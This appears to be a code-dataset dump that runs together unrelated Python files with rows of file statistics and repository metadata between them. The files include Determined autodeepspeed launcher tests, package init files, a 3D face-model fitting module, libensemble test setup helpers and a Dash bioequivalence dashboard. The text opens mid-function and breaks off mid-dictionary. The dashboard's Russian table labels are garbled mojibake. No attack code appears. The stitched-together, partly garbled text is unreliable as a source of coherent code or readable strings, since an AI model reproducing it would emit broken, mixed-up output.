    deepspeed_cmd = autodeepspeed.create_run_command("localhost", autodeepspeed.hostfile_path)
    pid_client_cmd = autodeepspeed.create_pid_client_cmd(cluster_info.allocation_id)
    log_redirect_cmd = autodeepspeed.create_log_redirect_cmd()
    harness_cmd = autodeepspeed.create_harness_cmd(train_entrypoint)
    launch_cmd = pid_server_cmd + deepspeed_cmd + pid_client_cmd + log_redirect_cmd + harness_cmd
    with set_container_id_env_var():
        autodeepspeed.main(train_entrypoint)
    mock_cluster_info.assert_called_once()
    assert os.environ["DET_CHIEF_IP"] == cluster_info.container_addrs[0]
    assert os.environ["USE_DEEPSPEED"] == "1"
    mock_subprocess.assert_called_once_with(launch_cmd)
@mock.patch("subprocess.Popen")
@mock.patch("determined.get_cluster_info")
def test_launch_fail(mock_cluster_info: mock.MagicMock, mock_subprocess: mock.MagicMock) -> None:
    """main() must return the launched process's non-zero exit code."""
    cluster_info = make_mock_cluster_info(["0.0.0.0"], 0)
    mock_cluster_info.return_value = cluster_info
    # Simulate the launched training process exiting with status 1.
    mock_subprocess.return_value.wait.return_value = 1
    train_entrypoint = "model_def:TrialClass"
    # Rebuild the expected launch chain for the single-container case.
    pid_server_cmd = autodeepspeed.create_pid_server_cmd(
        cluster_info.allocation_id, len(cluster_info.slot_ids)
    )
    deepspeed_cmd = autodeepspeed.create_run_command("localhost", autodeepspeed.hostfile_path)
    pid_client_cmd = autodeepspeed.create_pid_client_cmd(cluster_info.allocation_id)
    log_redirect_cmd = autodeepspeed.create_log_redirect_cmd()
    harness_cmd = autodeepspeed.create_harness_cmd(train_entrypoint)
    launch_cmd = pid_server_cmd + deepspeed_cmd + pid_client_cmd + log_redirect_cmd + harness_cmd
    with set_container_id_env_var():
        ret = autodeepspeed.main(train_entrypoint)
        assert ret == 1
    mock_cluster_info.assert_called_once()
    assert os.environ["DET_CHIEF_IP"] == cluster_info.container_addrs[0]
    assert os.environ["USE_DEEPSPEED"] == "1"
    mock_subprocess.assert_called_once_with(launch_cmd)
@mock.patch("subprocess.Popen")
@mock.patch("determined.get_cluster_info")
@mock.patch("determined.common.api.post")
def test_launch_worker(
    mock_api: mock.MagicMock, mock_cluster_info: mock.MagicMock, mock_subprocess: mock.MagicMock
) -> None:
    """Non-chief container (rank 1): main() posts to the master API once and
    runs only the pid-server + sshd command — no deepspeed launch chain."""
    cluster_info = make_mock_cluster_info(["0.0.0.0", "0.0.0.1"], 1)
    mock_cluster_info.return_value = cluster_info
    with set_container_id_env_var():
        autodeepspeed.main("model_def:TrialClass")
    mock_cluster_info.assert_called_once()
    assert os.environ["DET_CHIEF_IP"] == cluster_info.container_addrs[0]
    mock_api.assert_called_once()
    # Workers wrap sshd in the pid server and wait to be driven by the chief.
    pid_server_cmd = autodeepspeed.create_pid_server_cmd(
        cluster_info.allocation_id, len(cluster_info.slot_ids)
    )
    sshd_cmd = autodeepspeed.create_sshd_cmd()
    expected_cmd = pid_server_cmd + sshd_cmd
    mock_subprocess.assert_called_once_with(expected_cmd)
def make_mock_cluster_info(container_addrs: List[str], container_rank: int) -> det.ClusterInfo:
    """Build a det.ClusterInfo with fixed test identifiers and the given
    rendezvous topology (addresses + this container's rank)."""
    rendezvous = det.RendezvousInfo(
        container_addrs=container_addrs, container_rank=container_rank
    )
    return det.ClusterInfo(
        master_url="localhost",
        cluster_id="clusterId",
        agent_id="agentId",
        slot_ids=[0, 1, 2, 3],
        task_id="taskId",
        allocation_id="allocationId",
        session_token="sessionToken",
        task_type="TRIAL",
        rendezvous_info=rendezvous,
    )
@contextlib.contextmanager
def set_container_id_env_var() -> Iterator[None]:
    """Temporarily set DET_CONTAINER_ID to "containerId" for the with-block.

    BUG FIX: the original unconditionally deleted the variable on exit,
    destroying any value that existed before the block; now the previous
    value (if any) is restored.
    """
    prior = os.environ.get("DET_CONTAINER_ID")
    os.environ["DET_CONTAINER_ID"] = "containerId"
    try:
        yield
    finally:
        if prior is None:
            del os.environ["DET_CONTAINER_ID"]
        else:
            os.environ["DET_CONTAINER_ID"] = prior
| 37.703846
| 97
| 0.74365
| 1,315
| 9,803
| 5.145247
| 0.117871
| 0.100798
| 0.078037
| 0.009459
| 0.825303
| 0.809932
| 0.789388
| 0.78392
| 0.766923
| 0.766332
| 0
| 0.007398
| 0.158829
| 9,803
| 259
| 98
| 37.849421
| 0.813122
| 0.013159
| 0
| 0.650718
| 0
| 0
| 0.099266
| 0.037742
| 0
| 0
| 0
| 0
| 0.148325
| 1
| 0.043062
| false
| 0.009569
| 0.047847
| 0
| 0.124402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a794afc61ee22de0ab59c8150be151318fc4dc97
| 144
|
py
|
Python
|
hls4ml/__init__.py
|
ngpaladi/hls4ml
|
54861d0f611ee72f779a8f739b5fac571f3e79c2
|
[
"Apache-2.0"
] | 1
|
2021-07-06T12:09:49.000Z
|
2021-07-06T12:09:49.000Z
|
hls4ml/__init__.py
|
ngpaladi/hls4ml
|
54861d0f611ee72f779a8f739b5fac571f3e79c2
|
[
"Apache-2.0"
] | 1
|
2020-11-26T09:45:05.000Z
|
2020-11-26T09:45:05.000Z
|
hls4ml/__init__.py
|
ngpaladi/hls4ml
|
54861d0f611ee72f779a8f739b5fac571f3e79c2
|
[
"Apache-2.0"
] | null | null | null |
# hls4ml package root: pin the version and expose the public submodules.
from __future__ import absolute_import

# Package version string (single source of truth for the release number).
__version__ = '0.5.0'

# Re-export the public submodules at package level.
from hls4ml import converters
from hls4ml import report
from hls4ml import utils
| 18
| 38
| 0.819444
| 21
| 144
| 5.190476
| 0.52381
| 0.275229
| 0.440367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04878
| 0.145833
| 144
| 7
| 39
| 20.571429
| 0.837398
| 0
| 0
| 0
| 0
| 0
| 0.034722
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ac45453a19894882d58b1de661aabeddaf118808
| 40
|
py
|
Python
|
src/magicdb/Queries/__init__.py
|
CircleOnCircles/MagicDB
|
03fca4a2e4c75ad016a2338ac30f515393d20742
|
[
"MIT"
] | null | null | null |
src/magicdb/Queries/__init__.py
|
CircleOnCircles/MagicDB
|
03fca4a2e4c75ad016a2338ac30f515393d20742
|
[
"MIT"
] | null | null | null |
src/magicdb/Queries/__init__.py
|
CircleOnCircles/MagicDB
|
03fca4a2e4c75ad016a2338ac30f515393d20742
|
[
"MIT"
] | null | null | null |
from magicdb.Queries.Query import Query
| 20
| 39
| 0.85
| 6
| 40
| 5.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 1
| 40
| 40
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ac5232f986f8cddef39a53c01b7fafac3fd70f44
| 30
|
py
|
Python
|
cocob/__init__.py
|
mihahauke/scinol_icml2019
|
8f6bf250c9501a47d3c4b2323f830abcbf56cce3
|
[
"MIT"
] | 3
|
2020-04-30T11:32:46.000Z
|
2021-04-23T01:16:54.000Z
|
cocob/__init__.py
|
mihahauke/scinol_icml2019
|
8f6bf250c9501a47d3c4b2323f830abcbf56cce3
|
[
"MIT"
] | 6
|
2020-01-28T22:55:13.000Z
|
2022-02-10T00:20:24.000Z
|
cocob/__init__.py
|
mihahauke/scinol_icml2019
|
8f6bf250c9501a47d3c4b2323f830abcbf56cce3
|
[
"MIT"
] | 1
|
2020-09-23T07:26:31.000Z
|
2020-09-23T07:26:31.000Z
|
from .cocob_optimizer import *
| 30
| 30
| 0.833333
| 4
| 30
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 30
| 1
| 30
| 30
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ac6f63d697191beec992c5613929c859def5c39d
| 4,206
|
py
|
Python
|
deep3dmap/core/renderer/renderer_demo/fitting.py
|
achao2013/DeepRecon
|
1c9b0480710212e1fe86ab75dcf0b30bd9f654e7
|
[
"Apache-2.0"
] | 30
|
2022-02-05T18:35:27.000Z
|
2022-02-09T09:14:41.000Z
|
deep3dmap/core/renderer/renderer_demo/fitting.py
|
achao2013/DeepRecon
|
1c9b0480710212e1fe86ab75dcf0b30bd9f654e7
|
[
"Apache-2.0"
] | null | null | null |
deep3dmap/core/renderer/renderer_demo/fitting.py
|
achao2013/DeepRecon
|
1c9b0480710212e1fe86ab75dcf0b30bd9f654e7
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
from mesh.vertices import *
from geometry.camera import *
from time import time
def fit_points(x, X_ind, model, max_iter = 4):
    '''
    Fit 3DMM pose, shape and expression parameters to 2D landmarks by
    alternating pose estimation with shape/expression estimation.

    Args:
        x: (2, n) image points
        X_ind: (n,) corresponding Model vertices index
        model: 3DMM dict with 'shapeMU', 'shapePC', 'expPC', 'shapeEV', 'expEV'
        max_iter: iteration count for the alternation loop
    Returns:
        pose_para: (6, 1). pose parameters [s, rx, ry, rz, t2d[0], t2d[1]]
        sp: (199, 1). shape parameters
        ep: (29, 1). exp parameters
    '''
    #-- init
    sp = np.zeros((199, 1), dtype = np.float32)
    ep = np.zeros((29, 1), dtype = np.float32)

    #-------------------- estimate
    # Expand each vertex index into its x/y/z row indices in the flattened
    # (3*nver,) model arrays.
    X_ind_all = np.tile(X_ind[np.newaxis, :], [3, 1])*3
    X_ind_all[1, :] += 1
    X_ind_all[2, :] += 2
    valid_ind = X_ind_all.flatten('F')
    shapeMU = model['shapeMU'][valid_ind, :]
    shapePC = model['shapePC'][valid_ind, :]
    expPC = model['expPC'][valid_ind, :]

    for i in range(max_iter):
        X = shapeMU + shapePC.dot(sp) + expPC.dot(ep)
        # BUG FIX: `len(X)/3` was Python-2 integer division; under Python 3 it
        # yields a float and np.reshape raises. `//` gives the same value.
        X = np.reshape(X, [len(X) // 3, 3]).T

        #----- estimate pose
        P = estimate_affine_matrix(x, X)
        s, R, t2d = P2sRt(P)

        #----- estimate shape
        # expression (holding shape fixed)
        shape = shapePC.dot(sp)
        shape = np.reshape(shape, [len(shape) // 3, 3]).T
        ep = estimate_expression(x, shapeMU, expPC, model['expEV'], shape, s, R, t2d, lamb = 10)

        # shape (holding expression fixed)
        expression = expPC.dot(ep)
        expression = np.reshape(expression, [len(expression) // 3, 3]).T
        sp = estimate_shape(x, shapeMU, shapePC, model['shapeEV'], expression, s, R, t2d, lamb = 10)

    rx, ry, rz = matrix2angle(R)
    pose_para = np.array([s, rx, ry, rz, t2d[0], t2d[1]])[:, np.newaxis]
    return pose_para, sp, ep
def fit_points_simple(x, X_ind, model, max_iter = 4):
    '''
    Like fit_points, but fits only the first 100 shape and 25 expression
    components (faster, coarser), padding the results back to full size.

    Args:
        x: (2, n) image points
        X_ind: (n,) corresponding Model vertices index
        model: 3DMM dict with 'shapeMU', 'shapePC', 'expPC', 'shapeEV', 'expEV'
        max_iter: iteration count for the alternation loop
    Returns:
        pose_para: (6, 1). pose parameters [s, rx, ry, rz, t2d[0], t2d[1]]
        sp_f: (199, 1). shape parameters (zero-padded beyond n_sp)
        ep_f: (29, 1). exp parameters (zero-padded beyond n_ep)
    '''
    n_sp = 100
    n_ep = 25

    #-- init
    sp = np.zeros((n_sp, 1), dtype = np.float32)
    ep = np.zeros((n_ep, 1), dtype = np.float32)

    #-------------------- estimate
    # Expand each vertex index into its x/y/z row indices in the flattened
    # (3*nver,) model arrays.
    X_ind_all = np.tile(X_ind[np.newaxis, :], [3, 1])*3
    X_ind_all[1, :] += 1
    X_ind_all[2, :] += 2
    valid_ind = X_ind_all.flatten('F')
    shapeMU = model['shapeMU'][valid_ind, :]
    shapePC = model['shapePC'][valid_ind, :n_sp]
    expPC = model['expPC'][valid_ind, :n_ep]

    for i in range(max_iter):
        X = shapeMU + shapePC.dot(sp) + expPC.dot(ep)
        # BUG FIX: `len(X)/3` was Python-2 integer division; under Python 3 it
        # yields a float and np.reshape raises. `//` gives the same value.
        X = np.reshape(X, [len(X) // 3, 3]).T

        #----- estimate pose
        P = estimate_affine_matrix(x, X)
        s, R, t2d = P2sRt(P)

        #----- estimate shape
        # expression (holding shape fixed)
        shape = shapePC.dot(sp)
        shape = np.reshape(shape, [len(shape) // 3, 3]).T
        ep = estimate_expression(x, shapeMU, expPC, model['expEV'][:n_ep,:], shape, s, R, t2d, lamb = 20)

        # shape (holding expression fixed)
        expression = expPC.dot(ep)
        expression = np.reshape(expression, [len(expression) // 3, 3]).T
        sp = estimate_shape(x, shapeMU, shapePC, model['shapeEV'][:n_sp,:], expression, s, R, t2d, lamb = 40)

    rx, ry, rz = matrix2angle(R)
    pose_para = np.array([s, rx, ry, rz, t2d[0], t2d[1]])[:, np.newaxis]
    # Pad the truncated parameter vectors back to the model's full sizes.
    sp_f = np.zeros((199, 1), dtype = np.float32)
    sp_f[:n_sp, :] = sp
    ep_f = np.zeros((29, 1), dtype = np.float32)
    ep_f[:n_ep, :] = ep
    return pose_para, sp_f, ep_f
| 33.380952
| 122
| 0.532097
| 628
| 4,206
| 3.441083
| 0.16879
| 0.025914
| 0.025914
| 0.041647
| 0.886164
| 0.831559
| 0.831559
| 0.78112
| 0.78112
| 0.78112
| 0
| 0.049062
| 0.277936
| 4,206
| 126
| 123
| 33.380952
| 0.662496
| 0.282454
| 0
| 0.576271
| 0
| 0
| 0.022061
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033898
| false
| 0
| 0.084746
| 0
| 0.152542
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3be61a56bb8998d5cbef58672b419514146035c5
| 33
|
py
|
Python
|
labjack_u6/threading.py
|
LouGrossi/labjack_u6
|
36cb0be9a86e4f167ca58a5d30b59cfcfead00a6
|
[
"MIT"
] | null | null | null |
labjack_u6/threading.py
|
LouGrossi/labjack_u6
|
36cb0be9a86e4f167ca58a5d30b59cfcfead00a6
|
[
"MIT"
] | null | null | null |
labjack_u6/threading.py
|
LouGrossi/labjack_u6
|
36cb0be9a86e4f167ca58a5d30b59cfcfead00a6
|
[
"MIT"
] | null | null | null |
import threading, signal, time
| 8.25
| 30
| 0.757576
| 4
| 33
| 6.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 33
| 3
| 31
| 11
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3bea626f166d1bdebd5aad10c140520523e23500
| 2,594
|
py
|
Python
|
libensemble/tests/unit_tests/setup.py
|
Kardyne/libensemble
|
566c8f5daafe2ad4deebc13198a1e131e4ce6542
|
[
"BSD-2-Clause"
] | null | null | null |
libensemble/tests/unit_tests/setup.py
|
Kardyne/libensemble
|
566c8f5daafe2ad4deebc13198a1e131e4ce6542
|
[
"BSD-2-Clause"
] | null | null | null |
libensemble/tests/unit_tests/setup.py
|
Kardyne/libensemble
|
566c8f5daafe2ad4deebc13198a1e131e4ce6542
|
[
"BSD-2-Clause"
] | null | null | null |
import numpy as np
from libensemble.alloc_funcs.give_sim_work_first import give_sim_work_first
from libensemble.history import History
#-------------------------------------------------------------------------------------------------
# Set up sim_specs, gen_specs, exit_criteria
def make_criteria_and_specs_0(simx=10):
    """Specs variant 0: norm over 'x_on_cube' with an 'fvec' output, a
    uniform generator carrying 'priority'/'local_pt', stop after simx sims."""
    sim_specs = {
        'sim_f': np.linalg.norm,
        'in': ['x_on_cube'],
        'out': [('f', float), ('fvec', float, 3)],
    }
    gen_specs = {
        'gen_f': np.random.uniform,
        'in': [],
        'out': [('x_on_cube', float), ('priority', float), ('local_pt', bool)],
        'ub': np.ones(1),
        'nu': 0,
    }
    return sim_specs, gen_specs, {'sim_max': simx}
def make_criteria_and_specs_1(simx=10):
    """Specs variant 1: norm over 'x' producing 'g'; stops on sim count,
    a stop value for 'g', or elapsed wallclock time."""
    sim_specs = {
        'sim_f': np.linalg.norm,
        'in': ['x'],
        'out': [('g', float)],
    }
    gen_specs = {
        'gen_f': np.random.uniform,
        'in': [],
        'out': [('x', float), ('priority', float)],
    }
    exit_criteria = {
        'sim_max': simx,
        'stop_val': ('g', -1),
        'elapsed_wallclock_time': 0.5,
    }
    return sim_specs, gen_specs, exit_criteria
def make_criteria_and_specs_1A(simx=10):
    """Like variant 1, but the generator also emits its own 'sim_id'."""
    sim_specs = {
        'sim_f': np.linalg.norm,
        'in': ['x'],
        'out': [('g', float)],
    }
    gen_specs = {
        'gen_f': np.random.uniform,
        'in': [],
        'out': [('x', float), ('priority', float), ('sim_id', int)],
    }
    exit_criteria = {
        'sim_max': simx,
        'stop_val': ('g', -1),
        'elapsed_wallclock_time': 0.5,
    }
    return sim_specs, gen_specs, exit_criteria
#-------------------------------------------------------------------------------------------------
# Set up history array
def hist_setup1(sim_max=10, H0_in=[]):
    """Build a History (specs variant 0) and return it with all its specs.

    NOTE(review): the mutable default `H0_in=[]` is kept for interface
    compatibility; it is only passed through here, never mutated locally.
    """
    sim_specs, gen_specs, exit_criteria = make_criteria_and_specs_0(simx=sim_max)
    # default allocation function for libE
    alloc_specs = {'alloc_f': give_sim_work_first, 'out': [('allocated', bool)]}
    hist = History(alloc_specs, sim_specs, gen_specs, exit_criteria, H0_in)
    return hist, sim_specs, gen_specs, exit_criteria, alloc_specs
def hist_setup2(sim_max=10, H0_in=[]):
    """Build a History (specs variant 1) and return it with all its specs.

    NOTE(review): the mutable default `H0_in=[]` is kept for interface
    compatibility; it is only passed through here, never mutated locally.
    """
    sim_specs, gen_specs, exit_criteria = make_criteria_and_specs_1(simx=sim_max)
    # default allocation function for libE
    alloc_specs = {'alloc_f': give_sim_work_first, 'out': [('allocated', bool)]}
    hist = History(alloc_specs, sim_specs, gen_specs, exit_criteria, H0_in)
    return hist, sim_specs, gen_specs, exit_criteria, alloc_specs
def hist_setup2A_genout_sim_ids(sim_max=10):
    """Build a History (specs variant 1A, generator-provided sim_ids) with an
    empty initial history, returning it with all its specs."""
    sim_specs, gen_specs, exit_criteria = make_criteria_and_specs_1A(simx=sim_max)
    # default allocation function for libE
    alloc_specs = {'alloc_f': give_sim_work_first, 'out': [('allocated', bool)]}
    hist = History(alloc_specs, sim_specs, gen_specs, exit_criteria, [])
    return hist, sim_specs, gen_specs, exit_criteria, alloc_specs
| 49.884615
| 142
| 0.653045
| 385
| 2,594
| 4.044156
| 0.181818
| 0.082209
| 0.091843
| 0.13359
| 0.83237
| 0.81824
| 0.813102
| 0.813102
| 0.813102
| 0.813102
| 0
| 0.017376
| 0.112567
| 2,594
| 51
| 143
| 50.862745
| 0.658992
| 0.117965
| 0
| 0.5
| 0
| 0
| 0.118808
| 0.01929
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.083333
| 0
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ce23262bd1b8f73aa6bd64a6187908084ec94ccc
| 61,040
|
py
|
Python
|
SmartMedApp/backend/modules/dash/BioequivalenceDashboard.py
|
vovochkab/SmartMed
|
123540263db8ec2225e7bb0ea949ba96a8c5d4f3
|
[
"Apache-2.0"
] | 2
|
2020-10-05T18:03:46.000Z
|
2020-11-15T18:54:53.000Z
|
SmartMedApp/backend/modules/dash/BioequivalenceDashboard.py
|
vovochkab/SmartMed
|
123540263db8ec2225e7bb0ea949ba96a8c5d4f3
|
[
"Apache-2.0"
] | 2
|
2021-09-25T15:20:19.000Z
|
2021-09-26T15:56:52.000Z
|
SmartMedApp/backend/modules/dash/BioequivalenceDashboard.py
|
vovochkab/SmartMed
|
123540263db8ec2225e7bb0ea949ba96a8c5d4f3
|
[
"Apache-2.0"
] | 7
|
2020-09-07T17:28:54.000Z
|
2021-10-01T14:32:18.000Z
|
import dash
import dash_table
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objects as go
import plotly.express as px
import numpy as np
import pandas as pd
from math import e
from .text.markdown_bio import *
from .Dashboard import Dashboard
def round_df(df):
    """Format every non-str/non-int cell of *df* as a short display string, in place.

    Formatting rules per cell value v:
      * 0.01 <= v < 1000 : keep two decimals ("12.34")
      * v > 1000         : "d.dde<exponent>" built from the integer digits
      * repr already has 'e': truncate mantissa to 4 chars, keep exponent
      * v < 0.01         : "<first digit>.<next 2>e-<leading zero count>"
    Returns the mutated DataFrame.

    NOTE(review): leading non-digit characters (including a minus sign) are
    stripped before formatting, so negative values lose their sign — assumes
    non-negative inputs, TODO confirm. A value of exactly 1000 matches no
    branch and is left unchanged (preserved original behavior).
    """
    cols = df.columns
    for j in range(0, len(cols)):
        for i in range(len(df)):
            if type(df.iloc[i, j]) != str and type(df.iloc[i, j]) != int:
                num = str(df.iloc[i, j])
                num = num.replace(']', '')
                # Drop any leading non-digit characters (sign, brackets, ...).
                while not num[0].isdigit():
                    num = num[1:]
                if df.iloc[i, j] < 1000 and df.iloc[i, j] >= 0.01:
                    point = num.find('.')
                    df.iloc[i, j] = num[:point + 3]
                elif df.iloc[i, j] > 1000:
                    point = num.find('.')
                    num = num[:point]
                    df.iloc[i, j] = num[0] + '.' + \
                        num[1:3] + 'e' + str(len(num) - 1)
                elif 'e' in num:
                    epos = num.find('e')
                    df.iloc[i, j] = num[0:4] + num[epos:]
                elif df.iloc[i, j] < 0.01:
                    notnul = 2
                    # BUG FIX: the condition was `len(num) < notnul`, which is
                    # False on entry, so the zeros after "0." were never
                    # skipped and small values formatted as e.g. '0.00e-1'.
                    # Scan forward past the zeros instead.
                    while notnul < len(num) and num[notnul] == '0':
                        notnul += 1
                    if notnul == len(num):
                        df.iloc[i, j] = '0'
                    else:
                        df.iloc[i, j] = num[notnul] + '.' + \
                            num[notnul + 1:notnul + 3] + 'e-' + str(notnul - 1)
    return df
class BioequivalenceDashboard(Dashboard):
def _generate_layout(self):
    """Return the dashboard's root Div wrapping the pre-built children.

    NOTE(review): per the original comment, which metrics are included is
    decided where self.graphs_and_lists is assembled, not here — confirm.
    """
    # metrics inclusion is checked where self.graphs_and_lists is built
    return html.Div(self.graphs_and_lists)
def _generate_criteria(self):
    """Render the criteria-fulfilment table for the bioequivalence study.

    Selects, from self.settings[0], the results of the configured normality
    test (Kolmogorov-Smirnov vs Shapiro-Wilk) and variance-uniformity test
    (F / Levene for the parallel plan, Bartlett for the crossover plan) and
    renders them as a Dash DataTable next to an explanatory markdown panel.

    NOTE(review): the table labels below are non-ASCII runtime string
    literals (they appear garbled in this copy of the file) and are
    reproduced verbatim — do not "fix" them without checking the encoding
    of the original source.
    """
    if self.settings[0].plan == 'parallel':
        # Parallel-group design: one normality row per group (R, T) plus
        # one uniformity row for the combined RT comparison.
        if self.settings[0].check_normal == 'Kolmogorov' and self.settings[0].check_uniformity == 'F':
            data = {'ะัะธัะตัะธะน': ['ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ',
                                 'ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ', 'F-ะบัะธัะตัะธะน'],
                    'ะััะฟะฟะฐ': ['R', 'T', 'RT'],
                    'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั': [self.settings[0].kstest_r[0],
                                          self.settings[0].kstest_t[0], self.settings[0].f[0]],
                    'p-ััะพะฒะตะฝั': [self.settings[0].kstest_r[1],
                                  self.settings[0].kstest_t[1], self.settings[0].f[1]]}
        elif self.settings[0].check_normal == 'Kolmogorov' and self.settings[0].check_uniformity == 'Leven':
            data = {'ะัะธัะตัะธะน': ['ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ',
                                 'ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ', 'ะะตะฒะตะฝะฐ'],
                    'ะััะฟะฟะฐ': ['R', 'T', 'RT'],
                    'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั': [self.settings[0].kstest_r[0],
                                          self.settings[0].kstest_t[0], self.settings[0].levene[0]],
                    'p-ััะพะฒะตะฝั': [self.settings[0].kstest_r[1],
                                  self.settings[0].kstest_t[1], self.settings[0].levene[1]]}
        elif self.settings[0].check_normal == 'Shapiro' and self.settings[0].check_uniformity == 'Leven':
            data = {'ะัะธัะตัะธะน': ['ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ', 'ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ', 'ะะตะฒะตะฝะฐ'],
                    'ะััะฟะฟะฐ': ['R', 'T', 'RT'],
                    'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั': [self.settings[0].shapiro_r[0],
                                          self.settings[0].shapiro_t[0], self.settings[0].levene[0]],
                    'p-ััะพะฒะตะฝั': [self.settings[0].shapiro_r[1],
                                  self.settings[0].shapiro_t[1], self.settings[0].levene[1]]}
        else:
            # Fallback: Shapiro-Wilk normality + F uniformity.
            data = {'ะัะธัะตัะธะน': ['ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ', 'ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ', 'F-ะบัะธัะตัะธะน'],
                    'ะััะฟะฟะฐ': ['R', 'T', 'RT'],
                    'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั': [self.settings[0].shapiro_r[0],
                                          self.settings[0].shapiro_t[0], self.settings[0].f[0]],
                    'p-ััะพะฒะตะฝั': [self.settings[0].shapiro_r[1],
                                  self.settings[0].shapiro_t[1], self.settings[0].f[1]]}
        df = pd.DataFrame(data)
        df = round_df(df)
        # Four equal-width columns; table is exportable to xlsx.
        return html.Div([html.Div(html.H1(children='ะัะฟะพะปะฝะตะฝะธะต ะบัะธัะตัะธะตะฒ'),
                                  style={'text-align': 'center'}),
                         html.Div([
                             html.Div([
                                 html.Div([dash_table.DataTable(
                                     id='criteria',
                                     columns=[{"name": i, "id": i, "deletable": True}
                                              for i in df.columns],
                                     data=df.to_dict('records'),
                                     style_cell_conditional=[
                                         {'if': {'column_id': 'ะัะธัะตัะธะน'},
                                          'width': '25%'},
                                         {'if': {'column_id': 'ะััะฟะฟะฐ'},
                                          'width': '25%'},
                                         {'if': {'column_id': 'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั'},
                                          'width': '25%'},
                                         {'if': {'column_id': 'p-ััะพะฒะตะฝั'},
                                          'width': '25%'},
                                     ],
                                     style_table={'overflowX': 'auto'},
                                     export_format='xlsx'
                                 )], style={'border-color': 'rgb(220, 220, 220)',
                                            'border-style': 'solid', 'padding': '5px', 'margin': '5px'})],
                                 style={'width': '78%', 'display': 'inline-block'}),
                             html.Div(dcc.Markdown(children=markdown_text_criteria), style={
                                 'width': '18%', 'float': 'right', 'display': 'inline-block'})
                         ])
                         ], style={'margin': '50px'}
                        )
    else:
        # Crossover design: Bartlett rows for groups/periods plus one
        # normality row per (group, preparation) sample.
        if self.settings[0].check_normal == 'Kolmogorov':
            data = {'ะัะธัะตัะธะน': ['ะะฐััะปะตััะฐ', 'ะะฐััะปะตััะฐ',
                                 'ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ', 'ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ', 'ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ',
